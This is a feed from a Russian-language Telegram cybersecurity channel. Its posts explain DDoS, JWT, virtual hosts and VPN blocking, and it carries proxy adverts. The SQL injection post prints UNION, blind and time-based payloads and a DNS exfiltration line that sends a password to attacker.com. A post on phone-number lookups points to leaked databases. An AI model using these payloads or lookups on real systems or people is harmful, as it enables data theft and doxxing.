Tech Lab
5.63K subscribers
399 photos
26 videos
475 links
Ваша личная лаборатория по изучению всего IT и инструментов по кибер безопасности.

По peклaме: @Diggsale
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
💣 DDoS-атаки — когда сервис валят толпой

DDoS — логичное продолжение DoS, но уже на другом уровне.
Если DoS — это один источник, то DDoS — это тысячи и миллионы узлов, которые одновременно давят цель, пока она не перестаёт отвечать.

Что важно знать:

📌 Что это такое:
🔴DDoS (Distributed Denial of Service) — распределённая атака, при которой трафик идёт сразу с множества источников: ботнетов, заражённых серверов, IoT-устройств.


📌 Как выглядит:
🔴Запросы летят с тысяч IP из разных стран, сетей и ASN.
🔴В логах это выглядит как «нормальный» трафик, но в ненормальных объёмах.


📌 Почему сложнее защищаться:
🔴Блокировка одного IP не решает ничего.
🔴Нужно фильтровать по поведению, протоколам, типам запросов, а иногда резать целые регионы и подсети.


📌 Какие бывают:
🔴 volumetric — забивают канал (Gbps/Tbps);
🔴 protocol — ломают стек (SYN, UDP, ICMP);
🔴 application-layer — бьют по HTTP/API, имитируя живых пользователей.


📌 Где бьёт больнее всего:
🎯 онлайн-сервисы, банки, игры, маркетплейсы, госресурсы, API без rate-limit.


Короче говоря 🗣:DDoS — это не «сломать», а утопить сервис в трафике.
Код может быть идеальным, но без защиты инфраструктура ляжет первой.


Tech Lab | Чат | #Виды атак
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6
💡 SQL-инъекция: От UNION до кражи данных через DNS

Все знают ' OR '1'='1, но SQLi — это целый спектр техник. Разберём эволюцию от классики до скрытых атак.

🔍 1. UNION-based — когда результат виден
Работает, если данные из запроса выводятся на страницу
(список пользователей, посты). Позволяет "дописать" свой запрос к оригинальному и увидеть результат.

' UNION SELECT username, password FROM users-- 

Суть: Крадём данные напрямую из интерфейса.

🎭 2. Blind (Слепая) — когда результат не виден
Приложение не показывает данные, но его поведение меняется.
Атакующий задаёт вопросы "да/нет":

' AND (SELECT SUBSTRING(password,1,1) FROM users)='a'-- 

Если условие верно — страница загружается нормально, если нет — с ошибкой или пустая. Так посимвольно угадываем пароли.

⏱️ 3. Time-based — слепая, но с таймером
Разновидность слепой, где ответ — это задержка.
' AND IF((SELECT password) LIKE 'a%', SLEEP(5), 0)-- 

Если первый символ пароля — a, сервер "заснёт" на 5 секунд. Долгий ответ = угадали.

🌐 4. Out-of-band (DNS-экфильтрация) — хитрый обход
Когда ничто не помогает, заставляем саму базу данных отправить нам данные. Через DNS-запрос.
sql
' UNION SELECT LOAD_FILE('\\\\'(SELECT password)'.attacker.com\\test')--


Как работает:
🔵СУБД пытается прочитать "файл" по пути \\<украденный_пароль>.attacker.com\test.

🔵Для этого она делает DNS-запрос к домену attacker.com.

🔵В логах DNS-сервера злоумышленник видит полный запрос: <украденный_пароль>.attacker.com.

🔵Данные украдены.


💎 Итог:
🔵UNION — если виден вывод.

🔵Blind — если есть косвенная реакция.

🔵DNS-атака — когда другие методы бессильны, но можно выполнить произвольный запрос.

🔵Защита — не только фильтрация кавычек, а параметризованные запросы, минимальные права БД и мониторинг DNS.


Tech Lab | Чат | #Основы
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7
👁 Пробив по номеру в Telegram

Вокруг пробива по телефону в Telegram много мифов, но механика проста: мессенджер показывает совпадения из своей адресной книги и даёт боту доступ ровно к тому, что пользователь сам не закрыл в настройках.Поэтому часть «поиска» — это не магия, а правильно собранные источники.

Сегодня такие инструменты комбинируют несколько вещей:
📌 проверку номера через ботов-агрегаторов;
📌 сопоставление по аватару, username и следам в открытых чатах;
📌 поиск по слитым базам и OSINT-каталогам.


Если настройки приватности слабые — о тебе можно узнать больше, чем ты думаешь.


👉 Полное руководство

Tech Lab | Чат | #Cтатьи
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10
Media is too big
VIEW IN TELEGRAM
🤿 ТВОЯ ПРИВАТНОСТЬ МЕРТВА. Я ПОКАЖУ, КАК ЕЁ ВОСКРЕСИТЬ

📹Первоисточник


Tech Lab | Чат |  #Видео
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4
🔑 JWT: Цифровой паспорт в мире Web, который можно подделать

Когда вы входите в приложение, вам часто выдают не обычную куку, а JSON Web Token (JWT) — компактный и самодостаточный токен, который содержит всю информацию о сессии прямо внутри себя.

🤔 Зачем нужен JWT и как он устроен?
JWT создан для статусlessness — серверу не нужно хранить сессию в памяти. Он просто проверяет подпись токена и верит данным внутри. Токен состоит из трёх частей, разделённых точками:
Header.Payload.Signature

🔵Header (Заголовок): Обычно {"alg": "HS256", "typ": "JWT"}. Указывает алгоритм подписи (HS256, RS256, none) и тип.

🔵Payload (Полезная нагрузка): JSON-объект с утверждениями (claims). Например: {"sub": "user123", "name": "Vasya", "admin": false, "iat": 1516239022}.

🔵Signature (Подпись): Криптографическая подпись, которая гарантирует, что токен не был изменён. Создаётся путём хеширования base64UrlEncode(header) + "." + base64UrlEncode(payload) с использованием секретного ключа (для HS256) или приватного ключа (для RS256).


Пример токена: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

🛡Как защититься? Основные правила
🔵Никогда не доверяйте alg из токена. Жёстко задавайте алгоритм проверки на сервере.

🔵Всегда проверяйте подпись перед чтением payload.

🔵Используйте сложные, случайные секретные ключи для HS256.

🔵Проверяйте все claims в payload: iss (issuer), aud (audience), exp (expiration time). Не используйте none в продакшене.

🔵Храните приватные ключи в безопасности, публичные ключи — в доверенных источниках.

🔵Валидируйте параметр kid, запрещая пути и URL.


💎 Итог: JWT — мощный и удобный стандарт, но его «самодостаточность» — палка о двух концах. Одна ошибка в реализации (доверие заголовку, слабый ключ) превращает цифровой паспорт в легкоподделываемую бумажку, открывая дверь к полному захвату учётной записи.

Tech Lab | Чат | #Основы
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8
🌐 Виртуальные хосты — «невидимые» сайты на одном сервере. Как их настраивают, находят и взламывают.

Представьте одно здание с разными входами. Так работает веб-сервер с виртуальными хостами: на одном IP и порту живут несколько независимых сайтов. Ваш blog.com и shop.com могут физически быть на одной машине.

🔍 Три способа их различить:
🟢По имени (самый частый) — сервер смотрит на заголовок Host: в запросе и отдаёт нужный сайт.

🟢По IP-адресу — у каждого виртуального хоста свой уникальный IP на одном сервере.

🟢По порту — например, site.com:8080 и site.com:9000 (неудобно для пользователей).


🏢 Особый случай: локальные сети
В корпоративных сетях часто используют внутренние DNS-имена, которых нет в публичном интернете:
⚫️files.corp — файловое хранилище
⚫️wiki.internal — база знаний
⚫️monitor.local — панель мониторинга


Эти ресурсы доступны только изнутри сети. Пользователи даже не задумываются, что обращаются к виртуальным хостам.

В следующем посте разберём практический пример с командной строкой.

Tech Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8
🤣17
🎉Доброго времени суток, подписчики!

Продолжаем рубрику #OSINT

Напоминаем:
➡️ Ваша задача — найти это место. Город, улицу, точку съемки. Максимально точно.


🏆Правила игры:
⚫️Выкладывается фото

⚫️До следующего дня вы ищете место.

⚫️Пишете ответ в комментарии (первый правильный — молодец).


Готовьте глаза, карты и гугл. Будет жарко 😉

Ваше задание 👇

Наш ВПН
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3❤‍🔥1🆒1
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👍1
This media is not supported in your browser
VIEW IN TELEGRAM
На чем будет ездить админ если вы купите впн, давайте поможем админу осуществить мечту ! 🔥
😁11❤4🔥2
🛡 Как ТСПУ ловит VLESS в 2026 и почему XHTTP — следующий шаг

Статья разбирает методы детекции, которые работают прямо сейчас. Если ваш VLESS+Reality сервер лёг в последние месяцы — вы не один. В сообществах фиксируют волны блокировок, которые раньше не достигали хорошо настроенных Reality-серверов.

Как ТСПУ видят VLESS:

🔵JA3/JA4-отпечатки — TLS-рукопожатие имеет уникальные характеристики, которые можно детектировать
🔵Поведенческий анализ — даже при шифровании, паттерны трафика (размер пакетов, тайминги) могут выдать прокси
🔵Сертификаты — даже если они "поддельные", методы анализа становятся умнее


XHTTP — что это:

⚪️Новая транспортная обёртка, маскирующая прокси-трафик под обычный HTTP/3
⚪️Использует QUIC, который сложнее анализировать
⚪️Разработан для противодействия именно поведенческому анализу


➡️ Полная статья

VPN за 1₽ | Tech Lab | Чат | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
⚡️ Интернет есть, но нужные сервисы не работают?

😢 Telegram тормозит, Discord лагает, YouTube долго грузится, а ChatGPT и другие зарубежные сервисы открываются через раз. CherryProxy создан для стабильного доступа без лишних ограничений:
🔴Стабильный работа Telegram, Discord и других соц сетей;
🔴Быстрый YouTube в высоком качестве;
🔴ChatGPT, Claude и другие зарубежные AI;
🔴Работа мобильного интернета при локдаунах.


🎁 Для новых пользователей прилагается:
🔴3 дня бесплатно;
🔴До 5 устройств;
🔴Безлимитный трафик;
🔴149 ₽/месяц — и все основные устройства подключены


ПОДКЛЮЧИТЬСЯ
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Commando VM: Windows для хакеров

Commando VM (Complete Mandiant Offensive VM) — это специализированная виртуальная машина на базе Windows, созданная для пентестинга, работы Red Team и аудита защищённости корпоративных сетей


— Она превращает стандартную среду Windows в полноценную среду для тестирования безопасности

• Читать статью

VPN за 1₽ | Tech Lab | Чат
❤1
🤖 Энтузиаст задействовал 1000 аккаунтов ChatGPT, чтобы открыть бесплатный доступ к новой модели Astra в Telegram.

Он подключил их к боту, который отправляет сообщения пользователей в ChatGPT и возвращает ответы прямо в мессенджер. Теперь через него можно бесплатно общаться с ChatGPT-6 Astra.
Please open Telegram to view this post
VIEW IN TELEGRAM
💊3👍1😁1😨1